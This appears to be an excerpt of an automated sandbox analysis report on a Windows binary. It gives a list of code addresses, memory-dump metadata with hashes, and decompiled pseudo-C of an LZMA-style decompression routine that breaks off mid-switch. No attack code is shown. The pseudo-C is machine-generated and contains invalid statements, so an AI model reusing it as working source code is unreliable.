              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407291
              0x00407295
              0x004072b7
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00407354
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00000000
              0x00407079
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00000000
              0x00000000
              0x00000000
              0x004070be
              0x004070be
              0x004070c1
              0x004070f7
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x00407157
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c3
              0x0040738c

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
              • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407291, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00407291() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
